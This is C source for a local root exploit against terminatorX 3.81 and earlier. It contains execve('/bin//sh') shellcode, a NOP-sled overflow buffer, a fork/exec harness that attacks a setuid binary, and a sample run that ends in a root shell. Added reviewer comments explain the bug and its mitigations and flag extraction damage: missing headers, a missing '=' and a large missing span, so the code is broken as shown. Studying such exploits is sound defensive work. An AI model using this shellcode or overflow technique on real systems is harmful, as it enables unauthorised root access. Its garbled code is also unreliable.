/* TerminatorX V. <= 3.81 local root exploit by Li0n7 * * Typical local stack-based overflow * * Bugs discovered by c0wboy from 0x333 * * Contact Li0n7 voila fr * * Usage: ./terminatorX-exp [-r ][-b [-s ]] * * -r : no bruteforcing, try to execute shellcode with as return address * -b: enables bruteforcing * -s: bruteforces by using return address from to 0x00000000 * * Example: * *root@li0n7:/tmp/test/exploits# ./terminatorX-exp -b * * exploit: terminatorX V. <= 3.81 local root exploit by Li0n7 * discoverer: c0wb0y (www.0x333.org) * visit us: http://www.ioc.fr.st * contact me: Li0n7[at]voila[dot]fr * usage: ./xterminator2 [-r ][-b [-s ]] * *[+] Starting bruteforcing... *[+] Testing 0xbffff734... *terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König *terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license. *... *[+] Testing 0xbffff66c... *terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König *terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license. *... *tX: err: Error parsing terminatorXrc. *tX: Failed loading terminatorXrc - trying to load old binary rc. *+ tX_warning: LADSPA_PATH not set. Trying /usr/lib/ladspa:/usr/local/lib/ladspa ** tX_error: tX: Error: couldn't access directory "/usr/lib/ladspa". *+ tX_warning: Plugin "Sine Oscillator (Freq:audio, Amp:audio)" disabled. Not a 1-in/1-out plugin. *+ tX_warning: Plugin "Sine Oscillator (Freq:control, Amp:control)" disabled. Not a 1-in/1-out plugin. *+ tX_warning: Plugin "Stereo Amplifier" disabled. Not a 1-in/1-out plugin. *+ tX_warning: Plugin "White Noise Source" disabled. Not a 1-in/1-out plugin. 
*warning: failed to load external entity "%90%90...%90%901%C0Ph//shh/bin%...%BFl%F6%FF%BF"
*
*(terminatorX:3085): WARNING **: Invalid UTF8 string passed to pango_layout_set_text()
*sh-2.05b# exit
*exit
*[+] Exited: shell's ret code = 0
*[+] Ret address found: 0xbffff66c
*
*/

/* Reviewer note (defensive context): the header describes a stack-based
 * overflow in terminatorX's handling of its "-f" argument, reachable by a
 * local user where the binary carries elevated privileges ("local root",
 * presumably a setuid install).  The fixed D_START/RET addresses and the
 * descending-address bruteforce shown in the sample run presuppose a
 * non-randomised, executable stack; stack protectors, NX, ASLR and not
 * installing the binary setuid are the usual mitigations for this bug class.
 *
 * NOTE(review): this listing is damaged by HTML extraction: the six header
 * names after #include were stripped (the calls below need at least the
 * stdio/stdlib/string/errno/unistd/sys-wait headers), the '=' in the
 * shellcode definition is gone, and the text from make_string()'s loop
 * condition through bruteforce() and most of banner() is missing.  Nothing
 * below is reconstructed; the missing parts are only marked. */
#include #include #include #include #include #include

/* Payload layout constants. */
#define BSIZE 200                              // bytes of NOP sled + shellcode that make_string() lays down first
#define D_START 0xbffff734                     // default first return address for the bruteforce (-s overrides it)
#define PATH "/usr/local/bin/terminatorX"      // target binary; exec_vuln() runs it with "-f" and the crafted buffer
#define RET 0xbffff69e                         // not referenced by any function that survived extraction

/* Classic x86 Linux execve("/bin//sh") payload (the sample run in the header
 * ends in an sh prompt).  24 bytes, no embedded NUL, so strlen() on it is
 * meaningful.  The '=' between the declarator and the literals is missing in
 * this copy, so the line does not compile as shown. */
char shellcode[] "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3" "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/* buffer: heap string that make_string() builds and exec_vuln() hands to the
 * target as the "-f" argument.  ptr: write cursor into buffer.  Both are
 * process-global, so the child forked in tease() inherits them. */
char *buffer,*ptr;

/* Abort if an allocation returned NULL.  Never called in the visible code
 * (make_string() repeats the check inline).  Note that exit(0) reports
 * success to the shell on what is an error path, and the parameter shadows
 * the global of the same name. */
void checkme(char *buffer)
{
    if(!buffer) {
        fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
        exit(0);
    }
    return;
}

/* Child-side half of tease(): replace the process image with the target,
 * passing the crafted global buffer as the "-f" file argument (the code path
 * the header calls vulnerable).  Returns only if execl() fails; the caller
 * does not check for that. */
void exec_vuln()
{
    execl(PATH,PATH,"-f",buffer,NULL);
}

/* Run one attempt: fork, exec the target in the child, wait for it and report
 * how it ended.
 * Returns: the child's exit status if it exited normally (0 in the header's
 * run, where the spawned shell exited cleanly); the signal number if the
 * child was killed (presumably the common outcome of a wrong address guess);
 * 1 if wait() failed or the child was reported stopped.
 * Caveats visible here: if execl() fails, the child falls out of the else-if
 * chain and returns 1 into a second copy of main(); a wait() result for a
 * different pid is treated as impossible and abort()s; the "Stopped" branch
 * is unlikely to be reached because wait() is called without WUNTRACED. */
int tease()
{
    pid_t pid;
    pid_t wpid;
    int status;
    pid = fork();
    if ( pid == -1 ) {
        fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno));
        exit(13);
    } else if ( pid == 0 ) {
        exec_vuln();   // child: does not return unless execl() fails
    } else {
        wpid = wait(&status);
        if ( wpid == -1 ) {
            fprintf(stderr,"[-] %s: wait()\n", strerror(errno));
            return 1;
        } else if ( wpid != pid )
            abort();
        else {
            if ( WIFEXITED(status) ) {
                printf("[+] Exited: shell's ret code = %d\n", WEXITSTATUS(status));
                return WEXITSTATUS(status);
            } else if ( WIFSIGNALED(status) ) {
                return WTERMSIG(status);   // killed by signal: report the signal number
            } else {
                fprintf(stderr, "[-] Stopped.\n");
            }
        }
    }
    return 1;
}

/* Build the "-f" argument for return address ret_addr into the global buffer:
 * BSIZE bytes consisting of a 0x90 sled followed by the shellcode, then --
 * judging from the 'addr'/'addr_ptr' locals -- presumably a run of the return
 * address; the loop that writes it is missing from this copy.  Allocates 512
 * bytes on every call and the visible code never frees the previous buffer,
 * so a bruteforce loop leaks one allocation per attempt.  Declared int but
 * no return statement survives.
 * EXTRACTION DAMAGE: what follows "for(i=0;i" is the tail of banner()'s usage
 * fprintf (compare the "[-b [-s ]]" usage text in the header and the 'argv0'
 * parameter); the rest of make_string(), all of bruteforce() and the start of
 * banner() are gone. */
int make_string(long ret_addr)
{
    int i;
    long ret,addr,*addr_ptr;
    buffer = (char *)malloc(512);   // 512 > BSIZE: room for the address run after the sled+shellcode
    if(!buffer) {
        fprintf(stderr,"[-] Can't allocate memory, exiting...\n");
        exit(-1);                   // -1 becomes exit status 255
    }
    ret = ret_addr;
    ptr = buffer;
    memset(ptr,0x90,BSIZE-strlen(shellcode));   // NOP sled
    ptr += BSIZE-strlen(shellcode);
    /* ---- text missing between here and the end of banner() ---- */
    for(i=0;i][-b [-s ]]\n\n",argv0); }

/* Entry point.  Options (see option_list): -b enable the bruteforce, -r ADDR
 * try one return address, -s ADDR first address for the bruteforce (default
 * D_START).  -r acts immediately (build the buffer, run once, exit 0); -b is
 * only recorded and bruteforce() -- defined in the missing part of the file
 * -- runs after option parsing.  With neither, the program prints the banner
 * and exits 0. */
int main(int argc,char *argv[])
{
    char * option_list = "br:s:";
    int option,brute = 0, opterr = 0;   // NOTE(review): this local 'opterr' shadows getopt's global, so the
                                        // assignment does not silence getopt's own diagnostics (likely the intent)
    long ret,start = D_START;
    banner(argv[0]);                    // banner() is defined in the part lost to extraction
    if (argc < 1) exit(-1);             // argc is at least 1 under any normal invocation; effectively dead
    while((option = getopt(argc,argv,option_list)) != -1)
        switch(option) {
        case 'b':
            brute = 1;
            break;
        case 'r':
            ret = strtoul(optarg,NULL,0);   // base 0 accepts 0x... hex; with a NULL endptr, unparsable input silently yields 0
            make_string(ret);
            tease();
            exit(0);
            break;
        case 's':
            start = strtoul(optarg,NULL,0);   // same unchecked parse as -r
            break;
        case '?':
            fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
            banner(argv[0]);
            exit(-1);
        }
    if(brute) bruteforce(start);        // bruteforce() is also in the missing part of the file
    return 0;
}
// milw0rm.com [2003-11-13]